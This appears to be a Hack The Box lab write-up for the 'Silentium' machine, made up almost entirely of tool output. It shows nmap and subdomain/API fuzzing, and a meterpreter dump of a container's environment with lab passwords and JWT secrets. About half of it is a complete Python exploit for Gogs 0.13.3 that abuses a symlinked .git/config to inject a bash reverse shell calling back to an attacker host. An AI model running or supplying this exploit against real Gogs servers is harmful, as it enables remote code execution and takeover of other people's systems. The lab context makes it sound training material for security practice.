> For the complete documentation index, see [llms.txt](https://eth3real.gitbook.io/eth3real/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://eth3real.gitbook.io/eth3real/documentation/platforms/hackthebox/labs/easy/silentium.md).

# Silentium

```
┌──(kali㉿kali)-[~/HTB/Labs/Silentium]
└─$ nmap -A -sC -sV -p 22,80 10.129.28.148
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-13 12:27 +0530
Nmap scan report for silentium.htb (10.129.28.148)
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Silentium | Institutional Capital & Lending Solutions
|_http-server-header: nginx/1.24.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   148.47 ms 10.10.14.1
2   148.93 ms silentium.htb (10.129.28.148)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.83 seconds

```

```
┌──(kali㉿kali)-[~/HTB/Labs/Silentium]
└─$ ffuf -u http://silentium.htb -H 'Host: FUZZ.silentium.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs 178

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://silentium.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.silentium.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 178
________________________________________________

staging                 [Status: 200, Size: 3142, Words: 789, Lines: 70, Duration: 153ms]
:: Progress: [19966/19966] :: Job [1/1] :: 280 req/sec :: Duration: [0:01:14] :: Errors: 0 ::

```

```
┌──(kali㉿kali)-[~/HTB/Labs/Silentium]                                                                                                                                                                                                                                
└─$ dirsearch -u http://staging.silentium.htb/api/v1/                                                                                                                                                                                                                 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html                                                                                      
  from pkg_resources import DistributionNotFound, VersionConflict                                                                                                                                                               
                                                                                                                                                                                                                                
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                         
                                                                                                                                                                                                                                
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460                                                                                                                                    
                                                                                                                                                                                                                                
Output File: /home/kali/HTB/Labs/Silentium/reports/http_staging.silentium.htb/_api_v1__26-04-13_12-48-47.txt                                                                                                                    
                                                                                                                                                                                                                                
Target: http://staging.silentium.htb/                                                                                                                                                                                           
                                                                                                                                                                                                                                
[12:48:47] Starting: api/v1/                                                                                                                                                                                                    
[12:49:18] 200 -    3KB - /api/v1/attachments                                                                                                                                                                                   
[12:49:18] 200 -    3KB - /api/v1/attachments.html                                                                                                                                                                              
[12:49:18] 200 -    3KB - /api/v1/attachments.php                                                                                                                                                                               
[12:49:18] 200 -    3KB - /api/v1/attachments.js                                                                                                                                                                                
[12:49:18] 200 -    3KB - /api/v1/attachments.aspx                                                                                                                                                                              
[12:49:18] 200 -    3KB - /api/v1/attachments.jsp                                                                                                                                                                               
[12:49:18] 200 -    3KB - /api/v1/auth/login.php                                                                                                                                                    
[12:49:18] 200 -    3KB - /api/v1/auth/login                                                                                                                                                        
[12:49:18] 200 -    3KB - /api/v1/auth/login.aspx                                                                                                                                                   
[12:49:18] 200 -    3KB - /api/v1/auth/login.jsp                                                                                                                                                    
[12:49:18] 200 -    3KB - /api/v1/auth/login.html                                                                                                                                                   
[12:49:18] 200 -    3KB - /api/v1/auth/login.js                                                                                                                                                     
[12:49:32] 412 -  128B  - /api/v1/feedback                                                                                                                                                          
[12:49:32] 200 -    3KB - /api/v1/feedback.aspx                                                                                                                                                     
[12:49:32] 200 -    3KB - /api/v1/feedback.php                                                                                                                                                      
[12:49:32] 200 -    3KB - /api/v1/feedback.jsp                                                                                                                                                      
[12:49:32] 200 -    3KB - /api/v1/feedback.html                                                                                                              
[12:49:32] 200 -    3KB - /api/v1/feedback_js.js                                                                                                             
[12:49:32] 200 -    3KB - /api/v1/feedback.js                                                                                                                
[12:49:38] 200 -    3KB - /api/v1/ip.txt
[12:49:38] 200 -    3KB - /api/v1/ip_configs/
[12:49:38] 200 -    3KB - /api/v1/ipch/
[12:49:38] 200 -    3KB - /api/v1/ipython/tree
[12:49:44] 200 -    3KB - /api/v1/metrics
[12:49:44] 200 -    3KB - /api/v1/metrics/
[12:49:44] 200 -    3KB - /api/v1/metrics.json
[12:49:53] 200 -    4B  - /api/v1/ping
[12:50:00] 200 -    3KB - /api/v1/settings.php
[12:50:00] 200 -    3KB - /api/v1/settings.aspx
[12:50:00] 200 -   31B  - /api/v1/settings
[12:50:00] 200 -    3KB - /api/v1/settings.jsp
[12:50:00] 200 -    3KB - /api/v1/settings.js
[12:50:00] 200 -    3KB - /api/v1/settings.php.bak
[12:50:00] 200 -    3KB - /api/v1/settings.php.old
[12:50:00] 200 -    3KB - /api/v1/settings.php.dist
[12:50:00] 200 -    3KB - /api/v1/settings.html
[12:50:00] 200 -    3KB - /api/v1/settings.php.txt
[12:50:00] 200 -    3KB - /api/v1/settings.php.save
[12:50:00] 200 -   31B  - /api/v1/settings/
[12:50:00] 200 -    3KB - /api/v1/settings.php.swp
[12:50:00] 200 -    3KB - /api/v1/settings.php~
[12:50:00] 200 -    3KB - /api/v1/settings.py
[12:50:00] 200 -    3KB - /api/v1/settings.xml
[12:50:10] 200 -    3KB - /api/v1/version.web
[12:50:10] 200 -    3KB - /api/v1/version.txt
[12:50:10] 200 -   19B  - /api/v1/version
[12:50:10] 200 -   19B  - /api/v1/version/

Task Completed  
```

```
┌──(kali㉿kali)-[~/HTB/Labs/Silentium]     
└─$ curl -v http://staging.silentium.htb/api/v1/version                                
* Host staging.silentium.htb:80 was resolved.                                          
* IPv6: (none)                             
* IPv4: 10.129.28.148                      
*   Trying 10.129.28.148:80...             
* Established connection to staging.silentium.htb (10.129.28.148 port 80) from 10.10.15.149 port 37564                                                                        
* using HTTP/1.x                           
> GET /api/v1/version HTTP/1.1             
> Host: staging.silentium.htb              
> User-Agent: curl/8.19.0                  
> Accept: */*                              
>                                          
* Request completely sent off              
< HTTP/1.1 200 OK                          
< Server: nginx/1.24.0 (Ubuntu)            
< Date: Mon, 13 Apr 2026 07:21:47 GMT      
< Content-Type: application/json; charset=utf-8                                        
< Content-Length: 19                       
< Connection: keep-alive                   
< Vary: Origin                             
< Access-Control-Allow-Credentials: true
< ETag: W/"13-wL0siNAZfGEC1xvzt+/DTEDTEX4"
<                                          
* Connection #0 to host staging.silentium.htb:80 left intact                           
{"version":"3.0.5"} 
```

```bash
meterpreter > cat /proc/1/environ 
FLOWISE_PASSWORD=F1l3_d0ck3rALLOW_UNAUTHORIZED_CERTS=trueNODE_VERSION=20.19.4HOSTNAME=c78c3cceb7baYARN_VERSION=1.22.22SMTP_PORT=1025SHLVL=1PORT=3000HOME=/rootSENDER_EMAIL=ben@silentium.htbPUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browserJWT_ISSUER=ISSUERJWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDDSMTP_USERNAME=testSMTP_SECURE=falseJWT_REFRESH_TOKEN_EXPIRY_IN_MINUTES=43200FLOWISE_USERNAME=benPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binDATABASE_PATH=/root/.flowiseJWT_TOKEN_EXPIRY_IN_MINUTES=360JWT_AUDIENCE=AUDIENCESECRETKEY_PATH=/root/.flowisePWD=/SMTP_PASSWORD=r04D!!_R4geSMTP_HOST=mailhogJWT_REFRESH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDDSMTP_USER=testmeterpreter > 

```

passwords :&#x20;

```
F1l3_d0ck3r
```

```
r04D!!_R4ge
```

```
ben@silentium:/opt/gogs/gogs$ ./gogs -v
                                                                                    
Gogs version 0.13.3

```

```
#!/usr/bin/env python3

import argparse
import requests
import os
import subprocess
import shutil
import urllib3
import base64
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from rich.console import Console

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
console = Console()

def extract_csrf(html_text):
    soup = BeautifulSoup(html_text, "html.parser")
    token_input = soup.select_one("input[name=_csrf]")
    if token_input and token_input.get("value"):
        return token_input.get("value")
    raise ValueError("CSRF token not found")

def login(session, base_url, username, password):
    login_url = f"{base_url}/user/login"
    resp = session.get(login_url)
    csrf = extract_csrf(resp.text)
    data = {"_csrf": csrf, "user_name": username, "password": password}
    resp = session.post(login_url, headers={"Content-Type": "application/x-www-form-urlencoded"}, data=data, allow_redirects=True)
    if "user/login" in resp.url:
        raise ValueError("Authentication failed — check your credentials")
    console.print("[bold green][+] Authenticated successfully[/bold green]")
    return session.cookies

def get_application_token(session, base_url):
    settings_url = f"{base_url}/user/settings/applications"
    get_resp = session.get(settings_url, allow_redirects=True)
    csrf = extract_csrf(get_resp.text)
    data = {"_csrf": csrf, "name": os.urandom(8).hex()}
    resp = session.post(settings_url, data=data, allow_redirects=True)
    soup = BeautifulSoup(resp.text, "html.parser")
    token_div = soup.find("div", class_="ui info message")
    if not token_div:
        raise ValueError("Application token not found")
    token = token_div.find("p").text.strip()
    console.print(f"[bold green][+] Token: {token}[/bold green]")
    return token

def create_malicious_repo(session, base_url, token):
    api = f"{base_url}/api/v1/user/repos"
    repo_name = os.urandom(6).hex()
    data = {"name": repo_name, "description": "test", "auto_init": True, "readme": "Default"}
    session.headers.update({"Authorization": f"token {token}"})
    resp = session.post(api, json=data)
    console.print(f"[blue]Repo creation status: {resp.status_code}[/blue]")
    return repo_name

def upload_malicious_symlink(base_url, username, password, repo_name):
    repo_dir = f"/tmp/{repo_name}"
    parsed_url = urlparse(base_url)
    clone_url = f"{parsed_url.scheme}://{username}:{password}@{parsed_url.netloc}/{username}/{repo_name}.git"
    if os.path.exists(repo_dir):
        shutil.rmtree(repo_dir)
    subprocess.run(["git", "clone", clone_url, repo_dir], check=True)
    os.symlink(".git/config", os.path.join(repo_dir, "malicious_link"))
    subprocess.run(["git", "add", "malicious_link"], cwd=repo_dir, check=True)
    subprocess.run(["git", "config", "user.email", "a@a.com"], cwd=repo_dir, check=True)  # <-- add
    subprocess.run(["git", "config", "user.name", "a"], cwd=repo_dir, check=True)          # <-- add
    subprocess.run(["git", "commit", "-m", "init"], cwd=repo_dir, check=True)
    subprocess.run(["git", "push", "origin", "master"], cwd=repo_dir, check=True)

def exploit(session, base_url, token, username, repo_name, command):
    api = f"{base_url}/api/v1/repos/{username}/{repo_name}/contents/malicious_link"
    data = {"message": "update", "content": base64.b64encode(command.encode()).decode()}
    headers = {"Authorization": f"token {token}", "Content-Type": "application/json"}
    console.print("[bold green][+] Exploit sent — check your listener![/bold green]")
    try:
        session.put(api, json=data, headers=headers, timeout=5)
    except requests.exceptions.Timeout:
        pass

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=True, help="Gogs base URL")
    parser.add_argument("-lh", "--host", required=True, help="Attacker host")
    parser.add_argument("-lp", "--port", required=True, help="Attacker port")
    parser.add_argument("-U", "--username", required=True, help="Gogs username")
    parser.add_argument("-P", "--password", required=True, help="Gogs password")
    parser.add_argument("-x", "--proxy", action="store_true")
    args = parser.parse_args()

    session = requests.Session()
    if args.proxy:
        session.proxies.update({"http": "http://localhost:8080"})
    session.verify = False

    command = f"bash -c 'bash -i >& /dev/tcp/{args.host}/{args.port} 0>&1' #"

    try:
        login(session, args.url, args.username, args.password)
        token = get_application_token(session, args.url)
        repo_name = create_malicious_repo(session, args.url, token)
        git_config = f"""[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
\tsshCommand = {command}
[remote "origin"]
\turl = git@localhost:gogs/{repo_name}.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""
        upload_malicious_symlink(args.url, args.username, args.password, repo_name)
        exploit(session, args.url, token, args.username, repo_name, git_config)

    except Exception as e:
        console.print(f"[bold red][-] Error: {e}[/bold red]")

if __name__ == "__main__":
    main()
```
